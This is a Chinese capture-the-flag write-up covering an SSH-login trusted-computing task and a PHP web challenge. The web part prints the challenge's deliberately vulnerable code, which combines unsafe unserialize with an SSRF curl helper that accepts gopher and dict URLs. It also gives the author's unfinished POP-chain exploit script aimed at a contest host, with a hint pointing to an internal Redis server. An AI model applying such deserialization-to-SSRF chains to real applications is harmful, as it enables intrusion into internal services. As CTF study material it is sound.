可信计算
基于挑战码的双向认证1
可信计算赛题-双向认证挑战模式.docx
使用命令进行SSH登录上去
ssh [email protected] -p 18341 # 记得加上-p参数指定端口,不然默认的是22端口
看见word文档的提示,先尝试一下
直接获得了flag1
web
魔术方法__get()、__set()和__call()的用法
hint.php
<?php
highlight_file(__FILE__);
$hint = "Not db,but 127.0.0.1!!!redis-flag{really}";
?>
只做到这里
<?php
// highlight_file(__FILE__);
include "function.php";
class Rd
{
public $ending;
public $cl;
public $poc;
public function __destruct() // __destruct(),即析构函数(destructor), 与构造函数相反,当对象结束其生命周期时(例如对象所在的函数已调用完毕),系统自动执行析构函数
{
echo "All matters have concluded"."</br>";
}
public function __call($name, $arg) // __call(),当在对象中调用一个不可访问方法时,__call() 会被自动调用
{
foreach ($arg as $key => $value) {
if ($arg[0]['POC'] == "0.o") {
$this->cl->var1 = "get";
}
}
}
}
class Poc
{
public $payload;
public $fun;
public function __set($name, $value) // __set() 是一个魔术方法(Magic Method),用于在给未定义的属性赋值时自动调用。__set()是设置不存在的成员变量时调用的;
{
$this->payload = $name;
$this->fun = $value;
}
function getflag($paylaod)
{
echo "Have you genuinely accomplished what you set out to do?"."</br>";
file_get_contents($paylaod);
}
}
class Er
{
public $symbol;
public $Flag;
public function __construct() // __construct(),又称构造函数,它是一种会在创建对象时调用一次的函数
{
$this->symbol = True;
}
public function __set($name, $value) // __set() 是一个魔术方法(Magic Method),用于在给未定义的属性赋值时自动调用。__set()是设置不存在的成员变量时调用的;
{
if (preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',base64_decode($this->Flag))){
$value($this->Flag);
}
else {
echo "NoNoNo,please you can look hint.php"."</br>";
}
}
}
class Ha
{
public $start;
public $start1;
public $start2;
public function __construct()
{
echo $this->start1 . "__construct" . "</br>"; // __construct(),又称构造函数,它是一种会在创建对象时调用一次的函数
}
public function __destruct() // __destruct(),即析构函数(destructor),当对象结束其生命周期时(例如对象所在的函数已调用完毕),系统自动执行析构函数
{
if ($this->start2 === "o.0") {
$this->start1->Love($this->start);
echo "You are Good!"."</br>";
}
}
}
function get($url) {
$url=base64_decode($url);
var_dump($url);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
$output = curl_exec($ch);
$result_info = curl_getinfo($ch);
var_dump($result_info);
curl_close($ch);
var_dump($output);
}
# POP链子
#
$r = new Rd();
$c = new Poc();
$e = new Er();
$h = new Ha();
// 序列化Payload
$payload = urlencode(serialize($h));
echo $payload;
// 将Payload发送到目标网站
$data = [
'pop' => $payload,
];
$url = 'http://eci-2zece18v7toobwov2hoa.cloudeci1.ichunqiu.com/'; // 替换成目标网站的URL
$options = [
'http' => [
'method' => 'POST',
'header' => 'Content-type: application/x-www-form-urlencoded',
],
];
$context = stream_context_create($options);
$response = file_get_contents($url);
// 输出响应
echo $response;
// if (isset($_POST['pop'])) {
// $a = unserialize($_POST['pop']);
// } else {
// die("You are Silly goose!");
// }
?>